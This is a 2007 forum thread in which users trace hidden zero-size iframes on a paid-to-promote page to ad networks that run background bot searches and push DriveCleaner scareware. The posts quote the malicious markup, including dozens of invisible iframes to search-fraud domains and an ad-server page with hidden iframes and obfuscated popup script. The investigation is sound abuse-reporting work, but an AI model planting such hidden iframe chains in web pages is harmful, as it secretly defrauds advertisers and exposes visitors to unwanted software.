 Affiliate-sites.net PTP [in list], 0 iframes and more |
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Sites with 0-iframes or other nasty codesAdvertise Here
  |
| Guest_wagdoll_* |
 Mar 7 2007, 05:30 AM
Post
#1
|
|
Guests  |
Affiliate-sites.net PTP page. I hit this today and saw tons of searches going through the status bar, checked in adblock and confirmed this, but I am having problems finding exactly where they are coming from. I "think" that they may be somehow coming from the scoursearch page that Cathy has in a 0 iframe on her PTP page? But I can't say this for sure as I'm having trouble replicating it from either page, even though one or the other is definitely causing it to happen.
http://affiliate-sites.net/affiliates/page...hp?refid=tcontc has this code CODE <iframe src="http://affiliate-sites.net/sites.html" name="sites" scrolling="NO" width="1" height="1" frameborder="0">.</iframe> </body></html> This loads up a scoursearch portal page with some banners on it, invisibly, every time the PTP page loads. Somewhere on either here or on the PTP page itself is an ad that is causing the searches. The topmost level I can find for them is a network called zedo. That goes to count.exitexchange.com and that loads up the 0 iframe pages Here's a couple of examples This is the one that loaded the first time I saw the PTP page and it has 14 bot searches being done in the background http://www. eooxe.com/home.htm CODE <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.climbsearch.com/CP.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.fondsearch.com/SU.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.06581.com/SU.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.piqw.com/XML.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.seemsearch.com/SR.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.farssearch.net/CW.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wesearchs.com/GO.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.creepsearch.com/gos.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.cramsearch.com/CZ.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.pipsearch.com/GO.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.dipsearch.com/GO.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.seek55.com/GO.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.indeedsearch.com/SL.htm width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.talesearch.com/AC.htm width=0 height=0></IFRAME> Here's another that I got from the exitexchange URL that I confirmed comes through zedo scripts/iframes and runs even more searches http://www. lhydpp.com/home.html CODE <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.zergsearch.com/xr/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.zqdylhy.com/rs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.xbdsearch.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.glfind.com/ac/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.oofeed.com/cw/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.zdanzdy.com/rf/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.1afind.com/xr/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.afindb.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wmzwy.com/pro/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wyzlp.com/rs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.nbfind.com/ac/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.jjkksearch.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.lzhdyy.com/xr/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.lzhdyy.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.ilfind.com/cw/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wymfz.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.nntfind.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.haofind.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wsmsearch.com/cs/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.zdylhy.com/is/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.qwefind.com/is/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wegosearch.net/sk/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wzdan.com/is/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.zdywzdan.com/cc/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.khsearch.com/cc/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.asdfind.com/yc/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.wzdzl.com/is/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.jklsearch.com/rf/xml/addd.html width=0 height=0></IFRAME> <IFRAME FRAMEBORDER=NO SCROLLING=NO SRC=http://www.rtysearch.com/gu/xml/addd.html width=0 height=0></IFRAME> The problem is where is the zedo coming from? The page in Cathy's iframe is a scoursearch page with compact banner on it. The compact banner shows one banner, but has another one hidden. In the past compact banner have had porn pages with diallers hidden in 0 iframes attached to their banners, so I feel this is a potential suspect, except that I can't replicate it direct from that banner code. Another problem on these affiliate-sites.net PTP pages is drivecleaner. This is coming from something called http://www. artechmedia.com/adserver/adv7.php and again appears to come from the compactbanner. I tried hitting abuse report on the PTP page and just got redirected to the scoursearch page that was in the 0 iframe so I have not been able to report this to the site, though I think the 0 iframe that the owner placed on her site has been reported before as it has been running for quite some time. |
 |
 
|
| Guest_cubster_* |
Mar 7 2007, 05:55 AM
Post
#2
|
|
Guests |
Thanks Wagdoll, I have come across this page twice in the last 24 hours and cos Im not so clever, I knew something was happening as my computer slowed almost to a stop. Thanks!
|
|
|
|
|
Mar 9 2007, 10:12 AM
Post
#3
|
|
|
GPF Addict  Group: Senior Members Posts: 6398 Joined: 1-June 03 Member No.: 11327 |
QUOTE(wagdoll @ Mar 7 2007, 07:30 AM) [snapback]4655571[/snapback] The problem is where is the zedo coming from? The page in Cathy's iframe is a scoursearch page with compact banner on it. The compact banner shows one banner, but has another one hidden. In the past compact banner have had porn pages with diallers hidden in 0 iframes attached to their banners, so I feel this is a potential suspect, except that I can't replicate it direct from that banner code. Another problem on these affiliate-sites.net PTP pages is drivecleaner. This is coming from something called http://www. artechmedia.com/adserver/adv7.php and again appears to come from the compactbanner. I tried hitting abuse report on the PTP page and just got redirected to the scoursearch page that was in the 0 iframe so I have not been able to report this to the site, though I think the 0 iframe that the owner placed on her site has been reported before as it has been running for quite some time. Hi, I was looking at http://affiliate-sites . net/sites.html where the compact banner is (the page that appears as a scoursearch page). It has the code QUOTE <!-- Begin CompactBanner.com Code --> <script LANGUAGE=JavaScript> var max="0"; var site="freeandeasy"; var host="freeandeasy"; </SCRIPT> <script LANGUAGE=JavaScript SRC=http://server2.compactbanner.com/media468/initb.php> </SCRIPT> <!-- End CompactBanner.com Code --> on it behind a banner for a casino. When I ran the scoursearch page through mvent's detector i got a message saying QUOTE http://www . centraladserver.com/ad01.php .... leads to .... http://c5.zedo.com/jsc/c5/ff2.htm?n=377;c=...=22;w=800;h=600 The centraladserver link leads to a page with the code QUOTE <html> <head> <title></title> </head> <body text="#000000" leftmargin="0" topmargin="0" > <script language="Javascript" type="text/javascript" src="http://www.cpays.com/markettool/geotarget.img.php?member=tsystem&pt=monacogold/GeoTrageting/468x60/group3"></script> <iframe width=1 height=1 scrolling=no frameborder=0 framespacing=0 marginheight=0 marginwidth=0 border=0 hspace=0 vspace=0 align=center src=http://www.artechmedia.com/adserver/adv7.php></iframe> <IFRAME SRC=http://c5.zedo.com/jsc/c5/ff2.html?n=377;c=59;s=27;d=22;w=800;h=600 HEIGHT=1 WIDTH=1 SCROLLING=NO MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER=0 VSPACE=0 HSPACE=0></IFRAME> <script language="javascript"><!-- var dc=document; var date_ob=new Date(); dc.cookie='h2=o; path=/;';var bust=date_ob.getSeconds(); if(dc.cookie.indexOf('e=llo') <= 0 && dc.cookie.indexOf('2=o') > 0){ dc.write('<scr'+'ipt language="javascript" src="http://media.fastclick.net'); dc.write('/w/pop.cgi?sid=17820&m=2&tp=2&v=1.8&c='+bust+'"></scr'+'ipt>'); date_ob.setTime(date_ob.getTime()+43200000); dc.cookie='he=llo; path=/; expires='+ date_ob.toGMTString();} // --> </script> <!-- © stat24 / other pages --> <script type="text/javascript"> <!-- document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://s4.hit.stat24.com/_'+(new Date()).getTime()+'/script.js?id=.As6P7R80zs34U7a4FoWb5evfbtIIvrXr.R8_fM_kXX.d7/l=11"></'+'scr'+'ipt>'); //--> </script> </body> </html> Not sure if this is it or if you were looking for more. I didn't go any further with it. Also I had trouble duplacating this unless i cleared cache and cookies. So this is what ms freeandeasy has been up to since we last saw her (IMG:http://www.getpaidforum.com/forums/style_emoticons/default/ai.gif) This post has been edited by mcf: Mar 9 2007, 10:16 AM |
|
|
|
| Guest_wagdoll_* |
Mar 9 2007, 11:11 AM
Post
#4
|
|
Guests |
Nice work! That's the bits I was missing.
Did some whois checking and compactbanner, centraladserver and artechmedia are all subsidiaries of adinfinity. |
|
|
|
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
Advertise Here
| Lo-Fi Version | Time is now: 16th May 2012 - 04:39 PM |
Hosting Provided by:
HostingLagoon